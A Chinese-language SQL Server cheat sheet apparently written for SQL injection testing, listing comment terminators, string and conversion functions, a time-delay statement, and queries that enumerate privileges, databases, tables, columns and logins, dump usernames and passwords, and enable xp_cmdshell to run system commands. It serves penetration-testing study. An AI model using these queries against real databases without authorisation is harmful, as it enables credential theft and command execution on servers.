01.常用符号:函数:语句归类

常用符号

注释符

| 注释符 | 释义 | | —- | —- |

| -- -
+--+ | SQL注释风格 |

| ;%00 | 空字节 |

| /*...*/ | C注释风格 |

运算符

| 运算符 | 释义 | | —- | —- |

| + | 加法运算 |

| - | 减法运算 |

| * | 乘法运算 |

| / | 除法运算，如果两个表达式值都是整数，那么结果只取整数值，小数值将略去 |

| % | 取模运算，返回两数相除后的余数 |

| & | 位与逻辑运算 |

| ｜ | 位或逻辑运算 |

| ^ | 位异或运算 |

| = | 等于 |

| <> != | 不等于 |

| < | 小于 |

| > | 大于 |

| !< | 不小于 |

| <= | 小于等于 |

| … | … |

全局变量

| 变量 | 释义 | | —- | —- |

| @VERSION | SQL Server 版本 |

| @SEVERNAME | 运行SQL Server 的本地服务器名称 |

常见函数

数据库信息

| 函数 | 释义 | | —- | —- |

| DB_NAME()
DB_NAME(n) | 获取当前数据库名，有n则获取其他数据库名，n为数字1、2、3… |

| USER_NAME()
USER
system_user
current_user | 获取用户在数据库中的名字 |

| is_srvrolemember(‘sysadmin’)
is_srvrolemember(‘db_owner’)
is_srvrolemember(‘public’) | 判断当前用户权限 |

数据类型转换

| 函数 | 释义 | | —- | —- |

| ASCII(str) | 返回字符表达式最左端字符的ASCII 码值 |

| CHAR(str) | 将ASCII 码转换为字符 |

| cast(16 as VARBINARY(50)) | 将16转换为16进制 |

| CONVERT(VARBINARY(50),16) | 将16转换为16进制 |

| master.dbo.fn_varbintohexstr(16) | 将16转换为16进制 |

| STR(n) | 将数值型数据转为字符型数据 |

字符串操作函数

| 函数 | 释义 | | —- | —- |

| SUBSTRING (<expression>， <starting_ position>， length) | 返回从字符串左边第starting_position个字符起切割length个字符 |

| LEFT (<character_expression>， <integer_expression>) | 返回character_expression 左起 integer_expression 个字符 |

| RIGHT (<character_expression>， <integer_expression>) | 返回character_expression 右起 integer_expression 个字符 |

| QUOTENAME (<’character_expression’>[， quote_ character]) | 返回被特定字符括起来的字符串 |

| REPLICATE (character_expression,integer_expression) | 返回一个重复 character_expression 指定次数的字符串 |

| REVERSE (<character_expression>) | 将指定的字符串的字符排列顺序颠倒 |

| REPLACE (<string_expression1>， <string_expression2>， <string_expression3>) | 用string_expression3 替换在string_expression1 中的子串string_expression2 |

| SPACE (<integer_expression>) | 返回一个有指定长度的空白字符串 |

| STUFF (<character_expression1>， <start_ position>， <length>，<character_expression2>) | 用另一子串替换字符串指定位置、长度的子串 |

| CHARINDEX (<'substring_expression'>， <expression>) | 返回字符串中某个指定的子串出现的开始位置其中substring_expression 是所要查找的字符表达式，expression 可为字符串也可为列名表达式。如果没有发现子串，则返回0 值。 此函数不能用于TEXT 和IMAGE 数据类型。 |

| PATINDEX (<’%substring _expression%’>， <column_ name>) | 其中子串表达式前后必须有百分号“%”否则返回值为0。返回字符串中某个指定的子串出现的开始位置。与CHARINDEX 函数不同的是，PATINDEX函数的子串中可以使用通配符，且此函数可用于CHAR、 VARCHAR 和TEXT 数据类型。 |

字符串拼接

| 函数/语句 | 释义 | | —- | —- |

| CONCAT(text1, [text2],…) | 连接字符串函数，MSSQL 2012+ 支持 |

| CONCAT_WS ( separator, argument1, argument2 [, argumentN]… ) | 连接字符串函数，SQL Server 2017 (14.x) and later |

条件函数

| 函数/语句 | 释义 | | —- | —- |

| IF…ELSE… | 条件语句 |

| case when exp then state1 ELSE state2 end | 条件语句 |

延时函数

| 函数/语句 | 释义 | | —- | —- |

| WAITFOR DELAY ‘0:0:n’ | 延迟n s |

其他函数/语句

| 函数/语句 | 释义 | | —- | —- |

| LEN(str) | 计算字符串长度 |

| LOWER(str) | 将字符串的大写字母全部转成小写 |

| UPPER(str) | 将字符串的小写字母全部转成大写 |

| LTRIM() | 字符串头部的空格去掉 |

| RTRIM() | 把字符串尾部的空格去掉 |

常用语句

更多参考：https://bak.gm7.org/sqlwiki.netspi.com/attackQueries/informationGathering/index.html#sqlserver

| 说明 | 语句 | | —- | —- |

| 查看数据库权限 | select is_srvrolemember('sysadmin')
select is_srvrolemember('db_owner')
select is_srvrolemember('public') |

| 获取系统相关信息 | — 获取版本
select @@version;
— 获取用户名
select user;
— 获取服务器主机名
select @@servername;
— 获取所有用户
select name from master..syslogins |

| 获取数据库 | — 当前数据库
select db_name();
— 其他数据库,n为number类型，1、2、3、4…
select db_name(n);
— 其他数据库，修改后面dbid为 1 2 3
select name from master.dbo.sysdatabases where dbid=1
— 所有数据库
select name from master..sysdatabases; |

| 获取表 | select name from test..sysobjects where xtype = 'u'
— 第一张表
select top 1 name from 库名.dbo.sysobjects where xtype='U'
— 第二张表
select top 1 name from 库名.dbo.sysobjects where xtype='U' and name not in('第一张表')
— 第三张表
select top 1 name from 库名.dbo.sysobjects where xtype='U' and name not in(‘第一张表’,’第二张表’)
— 或者
— 每个库都有information_schema，可以不用加test，也支持跨库查，需要注意这样查询出来使用视图的
select table_name from test.information_schema.tables
— 从当前库获取表，去除视图
select table_name from information_schema.tables where table_type not in ('view'); |

| 获取列 | select name from test..syscolumns where id = (select id from test..sysobjects where name = 'users')
— 或者
select column_name from test.information_schema.columns where table_name = 'users';
— 或者，以下不支持跨库查询
select top 1 col_name(object_id('users'),1) from sysobjects;
— i 为第几个字段，int型
select top 1 col_name(object_id('users'),i) from sysobjects; |

| 获取值 | select username, password from users; |

| 查找存储过程 | select * from master..sysobjects where name like 'sp%' order by name desc |

| 判断XP_CMDSHELL是否存在 | (select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell') |

| 执行系统命令 | — 开启xp_cmdshell扩展存储过程
use master;
exec sp_configure 'show advanced options',1;
reconfigure;
exec sp_configure 'xp_cmdshell',1;
reconfigure;
— 执行系统命令
use master;
exec master..xp_cmdshell "whoami"; |